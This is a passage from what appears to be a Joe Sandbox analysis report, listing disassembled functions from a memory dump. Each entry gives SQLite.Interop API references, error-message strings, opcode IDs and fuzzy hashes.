                                                                                      • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 6C3DE625
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Info
                                                                                      • String ID: $2=l
                                                                                      • API String ID: 1807457897-3807051866
                                                                                      • Opcode ID: a0df16caf78052d2d9adb57b54b667867e7f86b847ac79f2e22a4bfabc35f857
                                                                                      • Instruction ID: 10100068550edd53bd2e7b7d0757638e2961a6141bfcffd20bb29d5c2ad0d43f
                                                                                      • Opcode Fuzzy Hash: a0df16caf78052d2d9adb57b54b667867e7f86b847ac79f2e22a4bfabc35f857
                                                                                      • Instruction Fuzzy Hash: 40412A725043889ADB228E28CC84BE6FFBDDB46308F1504EDE59987542D235BA45CFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C420970 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI943321d364f02e5d.SQLITE.INTEROP(?), ref: 6C4209E4
                                                                                      • SIfca3960780d005fa.SQLITE.INTEROP(?,?,?,000000FF), ref: 6C420A29
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I943321d364f02e5d.Ifca3960780d005fa.
                                                                                      • String ID: string or blob too big
                                                                                      • API String ID: 1473530643-2803948771
                                                                                      • Opcode ID: a3923fc4ea21545c972a7f1875c725b2973757928c46b9c96dfab3214d7513ce
                                                                                      • Instruction ID: e9a1db65a8f8b834903bedc23de603c60fa4554cf291f38cd17e6d616b197b82
                                                                                      • Opcode Fuzzy Hash: a3923fc4ea21545c972a7f1875c725b2973757928c46b9c96dfab3214d7513ce
                                                                                      • Instruction Fuzzy Hash: B031C1366041045BDB10DE6CDC51EAA77E5EB84238F2483AAFD2C8B7D1E632E911C7D1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3F83A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 107COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(unknown special query: %.*s,00000000,6C3F7DB8,?,00000002,?,?,6C3F7DB8,6C4F7DBD), ref: 6C3F848E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I1c7a7970970b9619.
                                                                                      • String ID: reads$unknown special query: %.*s
                                                                                      • API String ID: 962285590-1944320352
                                                                                      • Opcode ID: 5db347d60bf2b1111d3ca511a58d8a0f1805173de2a1eb8974edec7064b09d11
                                                                                      • Instruction ID: 9da9858b48df7907fc0d2a82a41986d8b812edc8bcadd12a802d8fd9d0778bf5
                                                                                      • Opcode Fuzzy Hash: 5db347d60bf2b1111d3ca511a58d8a0f1805173de2a1eb8974edec7064b09d11
                                                                                      • Instruction Fuzzy Hash: E031F676A051945FC714CE1A9450A66BFF5EF87318F1844DBE8E4CB616E2728503CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4864B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SIdc2e4e1ccfa9a043.SQLITE.INTEROP(?,00000000,00000000,00000000), ref: 6C486586
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,000000FF,000000FF,00000001,000000FF), ref: 6C4865AF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Idc2e4e1ccfa9a043.Ifc350ae509dc2b53.
                                                                                      • String ID: not authorized
                                                                                      • API String ID: 996374335-1028754665
                                                                                      • Opcode ID: 24c4a205a8c58743903d034eab22fe9bca6fa10a329de8a360b5c7be122ad84d
                                                                                      • Instruction ID: 94435ef967a5670e3e4dae47b73f0218e401a6225d6341a323bbbd31f1a27cc3
                                                                                      • Opcode Fuzzy Hash: 24c4a205a8c58743903d034eab22fe9bca6fa10a329de8a360b5c7be122ad84d
                                                                                      • Instruction Fuzzy Hash: 63312471A1A2209BD740CE08D845FD97361AB4173DF2803A9E838DBBCAD722D44687D5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3F86B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(?,?,00000000,?), ref: 6C3F8728
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(6C4F8C10,00000000,?,?,?), ref: 6C3F875D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I1c7a7970970b9619.I9c6d7cd7b7d38055.
                                                                                      • String ID: 0g?l
                                                                                      • API String ID: 649636270-2150497623
                                                                                      • Opcode ID: 76ece7659d2b755334d6a6bd1e6dcbe1c2842154b140dd74f3c95cc408dcb0e4
                                                                                      • Instruction ID: 600310346b3509d25a7716dd950ae97bc24902b413e14536139526d1ec4968c7
                                                                                      • Opcode Fuzzy Hash: 76ece7659d2b755334d6a6bd1e6dcbe1c2842154b140dd74f3c95cc408dcb0e4
                                                                                      • Instruction Fuzzy Hash: 4B21D6366005048BC718CB1AD981956F7E5FB81229B58497ED95AC7F10E733E81A8FD2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3F6550 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(no such cursor: %lld,00000000), ref: 6C3F658E
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000,000000FF,000000FF,00000001,000000FF), ref: 6C3F65B1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I1c7a7970970b9619.Ifc350ae509dc2b53.
                                                                                      • String ID: no such cursor: %lld
                                                                                      • API String ID: 1339256467-693494841
                                                                                      • Opcode ID: db7e2e83fd6b556f7830b5ff8da82871df837f573916b6801daeced2b4b24825
                                                                                      • Instruction ID: dfa029028583cf3a6e47b88efd614c86b7b5d1fd01a6c3a83f0a28dfce0779dd
                                                                                      • Opcode Fuzzy Hash: db7e2e83fd6b556f7830b5ff8da82871df837f573916b6801daeced2b4b24825
                                                                                      • Instruction Fuzzy Hash: B6119371A016145BCB20CE59DC40E9B73B4EB45738B14075DE869E7B84D731E855CAE1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C42A8A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI943321d364f02e5d.SQLITE.INTEROP ref: 6C42A900
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I943321d364f02e5d.
                                                                                      • String ID: pcx$string or blob too big
                                                                                      • API String ID: 1102784474-142857962
                                                                                      • Opcode ID: 0eadcf95c8f5fd9d8b3017cfc8b7e13def183156d93ce0509e9db5c05e9e7b9f
                                                                                      • Instruction ID: b41a742c2e011d56496d215ca51405d473960c647cb0ba652dfc3a08280fbd34
                                                                                      • Opcode Fuzzy Hash: 0eadcf95c8f5fd9d8b3017cfc8b7e13def183156d93ce0509e9db5c05e9e7b9f
                                                                                      • Instruction Fuzzy Hash: 30012872B0420413E724DD1D6C03FA9B3D98BC5239F24037EED289B7C1EBA1E91682D6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4862C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI24bb313f312e2857.SQLITE.INTEROP(?), ref: 6C486337
                                                                                      • SI1527d54f96ad891e.SQLITE.INTEROP(?,?,?), ref: 6C48634B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I1527d54f96ad891e.I24bb313f312e2857.
                                                                                      • String ID: integer overflow
                                                                                      • API String ID: 3503197305-1678498654
                                                                                      • Opcode ID: a623e6d124d85c81973bcfef944f243a0dc36902f7181e9899a1e84dddd1008a
                                                                                      • Instruction ID: f9fb6ddcd2cae02ad992b4f720e84704814a9b589adfc27e6cf5b6be1cfff7bf
                                                                                      • Opcode Fuzzy Hash: a623e6d124d85c81973bcfef944f243a0dc36902f7181e9899a1e84dddd1008a
                                                                                      • Instruction Fuzzy Hash: A41106319166005ADB11EE58A804FD177969F42339F1443D9E8689BBE2EB71C599C3C2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C41E3A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(%z%s"%w"."%w"."%w"="%w"."%w"."%w",00000000,6C4F7DBC,?,?,?,?,?,?,?,?,?,?,?,6C41E074,?), ref: 6C41E3DD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I1c7a7970970b9619.
                                                                                      • String ID: AND $%z%s"%w"."%w"."%w"="%w"."%w"."%w"
                                                                                      • API String ID: 962285590-433850526
                                                                                      • Opcode ID: 9373085851baa481f50718ba6323e674371892ad4b5fd4cd3cd8d95366324add
                                                                                      • Instruction ID: c5256963497d18efae694fedfff85b7ee8cd547f9f9fd048bb82a3f0b1e5a711
                                                                                      • Opcode Fuzzy Hash: 9373085851baa481f50718ba6323e674371892ad4b5fd4cd3cd8d95366324add
                                                                                      • Instruction Fuzzy Hash: 770181B52041987F9715CE8ADCC4DBBB7ADDBC9214B104069FD5987B00D671EC1287F2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C43EBF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(%s_stat,?,?), ref: 6C43EC05
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 6C43EC2F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I1c7a7970970b9619.Ifc350ae509dc2b53.
                                                                                      • String ID: %s_stat
                                                                                      • API String ID: 1339256467-920702477
                                                                                      • Opcode ID: a0dc466edd2d70f0a55a6d48644c34a30120c630c1fada0c7f63d2e2138c93bf
                                                                                      • Instruction ID: d0f7b7fa94106b655a633f0a91c03520adde157d42bbc4167972e8a3b5f4b412
                                                                                      • Opcode Fuzzy Hash: a0dc466edd2d70f0a55a6d48644c34a30120c630c1fada0c7f63d2e2138c93bf
                                                                                      • Instruction Fuzzy Hash: C8F05C337052613BE70085B9BC80F8ADBC4EF8406EF284A39F51CD3644D301AC9143D2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C404FE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(6C40C893,6C40C893,?,?,?,?,?,?,?,?,?,00000000,6C40871D,?,?,?), ref: 6C405001
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(6C40C893,6C40C893,?,?,?,?,?,?,?,?,?,00000000,6C40871D,?,?,?), ref: 6C40501D
                                                                                      Strings
                                                                                      • fts5: column queries are not supported (detail=none), xrefs: 6C404FF2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Ifc350ae509dc2b53.
                                                                                      • String ID: fts5: column queries are not supported (detail=none)
                                                                                      • API String ID: 223094752-3108996433
                                                                                      • Opcode ID: d789f569cecb0674937ddae593ac613f12745a37ab393372d0662c46490a34d7
                                                                                      • Instruction ID: a474c9639093b02c42fc24ad061b09294352c0f18d29591bb2c30e7f0d9a8e10
                                                                                      • Opcode Fuzzy Hash: d789f569cecb0674937ddae593ac613f12745a37ab393372d0662c46490a34d7
                                                                                      • Instruction Fuzzy Hash: 53E065B29901286786009B54AC00CDE376C9F1516EB080075FC0D57B01D322F659C6D6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3EC900 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(json_%s() needs an odd number of arguments), ref: 6C3EC910
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000,000000FF,000000FF,00000001,000000FF,json_%s() needs an odd number of arguments), ref: 6C3EC930
                                                                                      Strings
                                                                                      • json_%s() needs an odd number of arguments, xrefs: 6C3EC909
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I1c7a7970970b9619.Ifc350ae509dc2b53.
                                                                                      • String ID: json_%s() needs an odd number of arguments
                                                                                      • API String ID: 1339256467-3040682063
                                                                                      • Opcode ID: b1beb076efa6c80e69324e9b3cc2dd76fcd589efbffbc7fd2bd4738cbc3752d3
                                                                                      • Instruction ID: c1fa3e1a6bd7a424631853117c604608d1f8e7fe5a4e594b23586649e273b175
                                                                                      • Opcode Fuzzy Hash: b1beb076efa6c80e69324e9b3cc2dd76fcd589efbffbc7fd2bd4738cbc3752d3
                                                                                      • Instruction Fuzzy Hash: 8CE0263261802136C620A95C1C00EE632498782338F200359B834537C4DEA16914C2E6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%